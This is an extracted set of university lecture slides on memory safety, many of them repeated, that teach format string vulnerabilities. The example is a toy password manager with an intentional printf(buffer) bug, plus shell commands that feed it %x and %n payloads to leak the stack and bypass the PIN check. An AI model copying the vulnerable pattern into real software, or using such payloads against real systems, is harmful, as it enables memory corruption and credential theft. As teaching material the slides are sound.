Can we do more? www.tugraz.at
• Spatial memory safety violation to overwrite data
Ñ Weird state
• Do we have to overwrite the saved instruction pointer?
• Other memory safety violations?
• Write in a more powerful “weird machine language”?
33 Michael Schwarz — www.iaik.tugraz.at
![Page 158: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/158.jpg)
Can we do more? www.tugraz.at
• Spatial memory safety violation to overwrite data
Ñ Weird state
• Do we have to overwrite the saved instruction pointer?
• Other memory safety violations?
• Write in a more powerful “weird machine language”?
33 Michael Schwarz — www.iaik.tugraz.at
![Page 159: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/159.jpg)
Do we have to overwrite the Instruction Pointer? www.tugraz.at
• No Ñ just one “trick” to get into weird state
• Controlling the control flow Ñ weird state
• More ways to change instruction pointer
Ñ function pointers, vtables, ...
• Controlling the instruction pointer is not a requirement
• Control-flow hijacking is a “category of tricks”
34 Michael Schwarz — www.iaik.tugraz.at
![Page 160: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/160.jpg)
Do we have to overwrite the Instruction Pointer? www.tugraz.at
• No Ñ just one “trick” to get into weird state
• Controlling the control flow Ñ weird state
• More ways to change instruction pointer
Ñ function pointers, vtables, ...
• Controlling the instruction pointer is not a requirement
• Control-flow hijacking is a “category of tricks”
34 Michael Schwarz — www.iaik.tugraz.at
![Page 161: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/161.jpg)
Do we have to overwrite the Instruction Pointer? www.tugraz.at
• No Ñ just one “trick” to get into weird state
• Controlling the control flow Ñ weird state
• More ways to change instruction pointer
Ñ function pointers, vtables, ...
• Controlling the instruction pointer is not a requirement
• Control-flow hijacking is a “category of tricks”
34 Michael Schwarz — www.iaik.tugraz.at
![Page 162: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/162.jpg)
Do we have to overwrite the Instruction Pointer? www.tugraz.at
• No Ñ just one “trick” to get into weird state
• Controlling the control flow Ñ weird state
• More ways to change instruction pointer
Ñ function pointers, vtables, ...
• Controlling the instruction pointer is not a requirement
• Control-flow hijacking is a “category of tricks”
34 Michael Schwarz — www.iaik.tugraz.at
![Page 163: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/163.jpg)
Do we have to overwrite the Instruction Pointer? www.tugraz.at
• No Ñ just one “trick” to get into weird state
• Controlling the control flow Ñ weird state
• More ways to change instruction pointer
Ñ function pointers, vtables, ...
• Controlling the instruction pointer is not a requirement
• Control-flow hijacking is a “category of tricks”
34 Michael Schwarz — www.iaik.tugraz.at
![Page 164: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/164.jpg)
So, there is an alternative? www.tugraz.at
• Got rid of the mindset that we require code to program
• Input as a way of programming a device
• Modify data used in an FSM state (transition)
• Changing data to something not intended in the original FSM
Ñ weird state
• Assume gets bug is fixed, e.g., replaced by fgets
35 Michael Schwarz — www.iaik.tugraz.at
![Page 165: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/165.jpg)
So, there is an alternative? www.tugraz.at
• Got rid of the mindset that we require code to program
• Input as a way of programming a device
• Modify data used in an FSM state (transition)
• Changing data to something not intended in the original FSM
Ñ weird state
• Assume gets bug is fixed, e.g., replaced by fgets
35 Michael Schwarz — www.iaik.tugraz.at
![Page 166: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/166.jpg)
So, there is an alternative? www.tugraz.at
• Got rid of the mindset that we require code to program
• Input as a way of programming a device
• Modify data used in an FSM state (transition)
• Changing data to something not intended in the original FSM
Ñ weird state
• Assume gets bug is fixed, e.g., replaced by fgets
35 Michael Schwarz — www.iaik.tugraz.at
![Page 167: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/167.jpg)
So, there is an alternative? www.tugraz.at
• Got rid of the mindset that we require code to program
• Input as a way of programming a device
• Modify data used in an FSM state (transition)
• Changing data to something not intended in the original FSM
Ñ weird state
• Assume gets bug is fixed, e.g., replaced by fgets
35 Michael Schwarz — www.iaik.tugraz.at
![Page 168: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/168.jpg)
So, there is an alternative? www.tugraz.at
• Got rid of the mindset that we require code to program
• Input as a way of programming a device
• Modify data used in an FSM state (transition)
• Changing data to something not intended in the original FSM
Ñ weird state
• Assume gets bug is fixed, e.g., replaced by fgets
35 Michael Schwarz — www.iaik.tugraz.at
![Page 169: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/169.jpg)
The fixed Code www.tugraz.at
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
fgets(buffer, 16, stdin);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
36 Michael Schwarz — www.iaik.tugraz.at
![Page 170: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/170.jpg)
An Example (still continued): Simple Password Manager www.tugraz.at
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
fgets(buffer, 16, stdin);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
Read PIN
Show PIN
correct?
Show password list
Error message
Yes
No
• We ignored the “debug mode” before...
• One additional state in the FSM Ñ echos the input
• Security property stays the same
• It should be practically infeasible for an attacker to get the password list (output)
if he does not know the PIN (input)
37 Michael Schwarz — www.iaik.tugraz.at
![Page 171: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/171.jpg)
An Example (still continued): Simple Password Manager www.tugraz.at
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
fgets(buffer, 16, stdin);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
Read PIN
Show PIN
correct?
Show password list
Error message
Yes
No
• We ignored the “debug mode” before...
• One additional state in the FSM Ñ echos the input
• Security property stays the same
• It should be practically infeasible for an attacker to get the password list (output)
if he does not know the PIN (input)
37 Michael Schwarz — www.iaik.tugraz.at
![Page 172: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/172.jpg)
An Example (still continued): Simple Password Manager www.tugraz.at
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
fgets(buffer, 16, stdin);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
Read PIN
Show PIN
correct?
Show password list
Error message
Yes
No
• We ignored the “debug mode” before...
• One additional state in the FSM Ñ echos the input
• Security property stays the same
• It should be practically infeasible for an attacker to get the password list (output)
if he does not know the PIN (input)
37 Michael Schwarz — www.iaik.tugraz.at
![Page 173: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/173.jpg)
An Example (still continued): Simple Password Manager www.tugraz.at
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
fgets(buffer, 16, stdin);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
Read PIN
Show PIN
correct?
Show password list
Error message
Yes
No
• We ignored the “debug mode” before...
• One additional state in the FSM Ñ echos the input
• Security property stays the same
• It should be practically infeasible for an attacker to get the password list (output)
if he does not know the PIN (input)
37 Michael Schwarz — www.iaik.tugraz.at
![Page 174: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/174.jpg)
Another Compiler Warning with -Wformat-security www.tugraz.at
• Compile with all warnings enabled (-Wextra)
• Still a warning
pwdman1.c:9:32: warning: format not a string literal and
no format arguments [-Wformat-security]
if(getenv("DEBUG")) printf(buffer);
ˆ
• What does the man page of printf say?
man 3 printf
Code such as printf(foo); often indicates a bug, since foo may contain a %
character. If foo comes from untrusted user input, it may contain %n, causing the
printf() call to write to memory and creating a security hole.
38 Michael Schwarz — www.iaik.tugraz.at
![Page 175: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/175.jpg)
Another Compiler Warning with -Wformat-security www.tugraz.at
• Compile with all warnings enabled (-Wextra)
• Still a warning
pwdman1.c:9:32: warning: format not a string literal and
no format arguments [-Wformat-security]
if(getenv("DEBUG")) printf(buffer);
ˆ
• What does the man page of printf say?
man 3 printf
Code such as printf(foo); often indicates a bug, since foo may contain a %
character. If foo comes from untrusted user input, it may contain %n, causing the
printf() call to write to memory and creating a security hole.
38 Michael Schwarz — www.iaik.tugraz.at
![Page 176: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/176.jpg)
Another Compiler Warning with -Wformat-security www.tugraz.at
• Compile with all warnings enabled (-Wextra)
• Still a warning
pwdman1.c:9:32: warning: format not a string literal and
no format arguments [-Wformat-security]
if(getenv("DEBUG")) printf(buffer);
ˆ
• What does the man page of printf say?
man 3 printf
Code such as printf(foo); often indicates a bug, since foo may contain a %
character. If foo comes from untrusted user input, it may contain %n, causing the
printf() call to write to memory and creating a security hole.
38 Michael Schwarz — www.iaik.tugraz.at
![Page 177: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/177.jpg)
Another Compiler Warning with -Wformat-security www.tugraz.at
• Compile with all warnings enabled (-Wextra)
• Still a warning
pwdman1.c:9:32: warning: format not a string literal and
no format arguments [-Wformat-security]
if(getenv("DEBUG")) printf(buffer);
ˆ
• What does the man page of printf say?
man 3 printf
Code such as printf(foo); often indicates a bug, since foo may contain a %
character. If foo comes from untrusted user input, it may contain %n, causing the
printf() call to write to memory and creating a security hole.
38 Michael Schwarz — www.iaik.tugraz.at
![Page 178: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/178.jpg)
Wait, what? www.tugraz.at
• printf can create a security hole?
• Why can printf write to memory?
• It is supposed to print text to the standard output...
39 Michael Schwarz — www.iaik.tugraz.at
![Page 179: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/179.jpg)
Wait, what? www.tugraz.at
• printf can create a security hole?
• Why can printf write to memory?
• It is supposed to print text to the standard output...
39 Michael Schwarz — www.iaik.tugraz.at
![Page 180: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/180.jpg)
Wait, what? www.tugraz.at
• printf can create a security hole?
• Why can printf write to memory?
• It is supposed to print text to the standard output...
39 Michael Schwarz — www.iaik.tugraz.at
![Page 181: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/181.jpg)
Re-cap: Format Strings www.tugraz.at
• We remember how to use printf:printf("%d = 0x%x\n", 20, 20);
• Format string parameters (%d, %s, ...) convert function
parameters to strings
• What if the number of format string parameters does not
match the number of arguments?
• The function does not know
• Fetched form registers (first) and stack (afterwards)
40 Michael Schwarz — www.iaik.tugraz.at
![Page 182: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/182.jpg)
Re-cap: Format Strings www.tugraz.at
• We remember how to use printf:printf("%d = 0x%x\n", 20, 20);
• Format string parameters (%d, %s, ...) convert function
parameters to strings
• What if the number of format string parameters does not
match the number of arguments?
• The function does not know
• Fetched form registers (first) and stack (afterwards)
40 Michael Schwarz — www.iaik.tugraz.at
![Page 183: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/183.jpg)
Re-cap: Format Strings www.tugraz.at
• We remember how to use printf:printf("%d = 0x%x\n", 20, 20);
• Format string parameters (%d, %s, ...) convert function
parameters to strings
• What if the number of format string parameters does not
match the number of arguments?
• The function does not know
• Fetched form registers (first) and stack (afterwards)
40 Michael Schwarz — www.iaik.tugraz.at
![Page 184: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/184.jpg)
Re-cap: Format Strings www.tugraz.at
• We remember how to use printf:printf("%d = 0x%x\n", 20, 20);
• Format string parameters (%d, %s, ...) convert function
parameters to strings
• What if the number of format string parameters does not
match the number of arguments?
• The function does not know
• Fetched form registers (first) and stack (afterwards)
40 Michael Schwarz — www.iaik.tugraz.at
![Page 185: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/185.jpg)
Re-cap: Format Strings www.tugraz.at
• We remember how to use printf:printf("%d = 0x%x\n", 20, 20);
• Format string parameters (%d, %s, ...) convert function
parameters to strings
• What if the number of format string parameters does not
match the number of arguments?
• The function does not know
• Fetched form registers (first) and stack (afterwards)
40 Michael Schwarz — www.iaik.tugraz.at
![Page 186: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/186.jpg)
Re-cap: Format Strings www.tugraz.at
• printf(user input); Ñ user input is format string
• No parameters to the function
• Input does not contain a format string parameter Ñ fine
• Format string parameter in the input Ñ output a register value
or stack value
41 Michael Schwarz — www.iaik.tugraz.at
![Page 187: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/187.jpg)
Re-cap: Format Strings www.tugraz.at
• printf(user input); Ñ user input is format string
• No parameters to the function
• Input does not contain a format string parameter Ñ fine
• Format string parameter in the input Ñ output a register value
or stack value
41 Michael Schwarz — www.iaik.tugraz.at
![Page 188: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/188.jpg)
Re-cap: Format Strings www.tugraz.at
• printf(user input); Ñ user input is format string
• No parameters to the function
• Input does not contain a format string parameter Ñ fine
• Format string parameter in the input Ñ output a register value
or stack value
41 Michael Schwarz — www.iaik.tugraz.at
![Page 189: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/189.jpg)
Re-cap: Format Strings www.tugraz.at
• printf(user input); Ñ user input is format string
• No parameters to the function
• Input does not contain a format string parameter Ñ fine
• Format string parameter in the input Ñ output a register value
or stack value
41 Michael Schwarz — www.iaik.tugraz.at
![Page 190: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/190.jpg)
Trigger the Bug www.tugraz.at
% DEBUG=1 ./pwdman1
Enter PIN:
%x %x %x %x
10 f76b55a0 f76f5858 25207825
Wrong PIN!
Enter PIN:
• Weird state - printing values from memory is not in our FSM
• How can we “program” this weird state?
42 Michael Schwarz — www.iaik.tugraz.at
![Page 191: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/191.jpg)
Trigger the Bug www.tugraz.at
% DEBUG=1 ./pwdman1
Enter PIN:
%x %x %x %x
10 f76b55a0 f76f5858 25207825
Wrong PIN!
Enter PIN:
• Weird state - printing values from memory is not in our FSM
• How can we “program” this weird state?
42 Michael Schwarz — www.iaik.tugraz.at
![Page 192: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/192.jpg)
Trigger the Bug www.tugraz.at
% DEBUG=1 ./pwdman1
Enter PIN:
%x %x %x %x
10 f76b55a0 f76f5858 25207825
Wrong PIN!
Enter PIN:
• Weird state - printing values from memory is not in our FSM
• How can we “program” this weird state?
42 Michael Schwarz — www.iaik.tugraz.at
![Page 193: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/193.jpg)
Trigger the Bug www.tugraz.at
% DEBUG=1 ./pwdman1
Enter PIN:
%x %x %x %x
10 f76b55a0 f76f5858 25207825
Wrong PIN!
Enter PIN:
• Weird state - printing values from memory is not in our FSM
• How can we “program” this weird state?
42 Michael Schwarz — www.iaik.tugraz.at
![Page 194: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/194.jpg)
Format Strings - Data Manipulation www.tugraz.at
• A little-known format string parameter: %n
man 3 printf
n The number of characters written so far is stored into the
integer pointed to by the corresponding argument. That
argument shall be an int *, or variant whose size matches the
(optionally) supplied integer length modifier.
• Example:
int count;
printf("Some string %n\n", &count);
printf("Wrote %d charachters\n", count);
Prints Wrote 12 characters
43 Michael Schwarz — www.iaik.tugraz.at
![Page 195: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/195.jpg)
Format Strings - Data Manipulation www.tugraz.at
• A little-known format string parameter: %n
man 3 printf
n The number of characters written so far is stored into the
integer pointed to by the corresponding argument. That
argument shall be an int *, or variant whose size matches the
(optionally) supplied integer length modifier.
• Example:
int count;
printf("Some string %n\n", &count);
printf("Wrote %d charachters\n", count);
Prints Wrote 12 characters
43 Michael Schwarz — www.iaik.tugraz.at
![Page 196: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/196.jpg)
Format Strings - Data Manipulation www.tugraz.at
• A little-known format string parameter: %n
man 3 printf
n The number of characters written so far is stored into the
integer pointed to by the corresponding argument. That
argument shall be an int *, or variant whose size matches the
(optionally) supplied integer length modifier.
• Example:
int count;
printf("Some string %n\n", &count);
printf("Wrote %d charachters\n", count);
Prints Wrote 12 characters
43 Michael Schwarz — www.iaik.tugraz.at
![Page 197: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/197.jpg)
Format Strings - Data Manipulation www.tugraz.at
• A little-known format string parameter: %n
man 3 printf
n The number of characters written so far is stored into the
integer pointed to by the corresponding argument. That
argument shall be an int *, or variant whose size matches the
(optionally) supplied integer length modifier.
• Example:
int count;
printf("Some string %n\n", &count);
printf("Wrote %d charachters\n", count);
Prints Wrote 12 characters
43 Michael Schwarz — www.iaik.tugraz.at
![Page 198: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/198.jpg)
Format Strings - Data Manipulation www.tugraz.at
• If there is an address on the stack, we can write to it
• Format string is on the stack Ñ we can put any value onto
the stack
• Can be the address to write to
44 Michael Schwarz — www.iaik.tugraz.at
![Page 199: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/199.jpg)
Format Strings - Data Manipulation www.tugraz.at
• If there is an address on the stack, we can write to it
• Format string is on the stack Ñ we can put any value onto
the stack
• Can be the address to write to
44 Michael Schwarz — www.iaik.tugraz.at
![Page 200: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/200.jpg)
Format Strings - Data Manipulation www.tugraz.at
• If there is an address on the stack, we can write to it
• Format string is on the stack Ñ we can put any value onto
the stack
• Can be the address to write to
44 Michael Schwarz — www.iaik.tugraz.at
![Page 201: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/201.jpg)
Playing around... www.tugraz.at
% echo "\x01\x02\x03\x04%x %x %x %x" | \
DEBUG=1 ./pwdman1
Enter PIN:
10 f7f945a0 f7fd4858 4030201
Wrong PIN!
Enter PIN:
% echo "\xb8\xcd\xff\xff%x %x %x %x" | \
DEBUG=1 ./pwdman1
Enter PIN:
? ? ? ? 10 f7f945a0 f7fd4858 ffffcdb8
Wrong PIN!
Enter PIN:
45 Michael Schwarz — www.iaik.tugraz.at
![Page 202: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/202.jpg)
Playing around... www.tugraz.at
% echo "\x01\x02\x03\x04%x %x %x %x" | \
DEBUG=1 ./pwdman1
Enter PIN:
10 f7f945a0 f7fd4858 4030201
Wrong PIN!
Enter PIN:
% echo "\xb8\xcd\xff\xff%x %x %x %x" | \
DEBUG=1 ./pwdman1
Enter PIN:
? ? ? ? 10 f7f945a0 f7fd4858 ffffcdb8
Wrong PIN!
Enter PIN:
45 Michael Schwarz — www.iaik.tugraz.at
![Page 203: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/203.jpg)
Playing around... www.tugraz.at
% echo "\x01\x02\x03\x04%x %x %x %x" | \
DEBUG=1 ./pwdman1
Enter PIN:
10 f7f945a0 f7fd4858 4030201
Wrong PIN!
Enter PIN:
% echo "\xb8\xcd\xff\xff%x %x %x %x" | \
DEBUG=1 ./pwdman1
Enter PIN:
? ? ? ? 10 f7f945a0 f7fd4858 ffffcdb8
Wrong PIN!
Enter PIN:
45 Michael Schwarz — www.iaik.tugraz.at
![Page 204: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/204.jpg)
Playing around... www.tugraz.at
% echo "\x01\x02\x03\x04%x %x %x %x" | \
DEBUG=1 ./pwdman1
Enter PIN:
10 f7f945a0 f7fd4858 4030201
Wrong PIN!
Enter PIN:
% echo "\xb8\xcd\xff\xff%x %x %x %x" | \
DEBUG=1 ./pwdman1
Enter PIN:
? ? ? ? 10 f7f945a0 f7fd4858 ffffcdb8
Wrong PIN!
Enter PIN:
45 Michael Schwarz — www.iaik.tugraz.at
![Page 205: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/205.jpg)
Programming the Weird State www.tugraz.at
% echo "\xb8\xcd\xff\xff%x %x %x %n" | \
DEBUG=1 ./pwdman1
Enter PIN:
? ? ? ? 10 f7f945a0 f7fd4858 root:toor
user:password1234
• With %n, we overwrote the correct variable at address
0xffffcdb8
• Programmed the weird machine using the input...
• ...to transition to sane state “Show Password List”
46 Michael Schwarz — www.iaik.tugraz.at
![Page 206: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/206.jpg)
Programming the Weird State www.tugraz.at
% echo "\xb8\xcd\xff\xff%x %x %x %n" | \
DEBUG=1 ./pwdman1
Enter PIN:
? ? ? ? 10 f7f945a0 f7fd4858 root:toor
user:password1234
• With %n, we overwrote the correct variable at address
0xffffcdb8
• Programmed the weird machine using the input...
• ...to transition to sane state “Show Password List”
46 Michael Schwarz — www.iaik.tugraz.at
![Page 207: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/207.jpg)
Programming the Weird State www.tugraz.at
% echo "\xb8\xcd\xff\xff%x %x %x %n" | \
DEBUG=1 ./pwdman1
Enter PIN:
? ? ? ? 10 f7f945a0 f7fd4858 root:toor
user:password1234
• With %n, we overwrote the correct variable at address
0xffffcdb8
• Programmed the weird machine using the input...
• ...to transition to sane state “Show Password List”
46 Michael Schwarz — www.iaik.tugraz.at
![Page 208: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/208.jpg)
Programming the Weird State www.tugraz.at
% echo "\xb8\xcd\xff\xff%x %x %x %n" | \
DEBUG=1 ./pwdman1
Enter PIN:
? ? ? ? 10 f7f945a0 f7fd4858 root:toor
user:password1234
• With %n, we overwrote the correct variable at address
0xffffcdb8
• Programmed the weird machine using the input...
• ...to transition to sane state “Show Password List”
46 Michael Schwarz — www.iaik.tugraz.at
![Page 209: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/209.jpg)
Programming the Weird State www.tugraz.at
% echo "\xb8\xcd\xff\xff%x %x %x %n" | \
DEBUG=1 ./pwdman1
Enter PIN:
? ? ? ? 10 f7f945a0 f7fd4858 root:toor
user:password1234
• With %n, we overwrote the correct variable at address
0xffffcdb8
• Programmed the weird machine using the input...
• ...to transition to sane state “Show Password List”
46 Michael Schwarz — www.iaik.tugraz.at
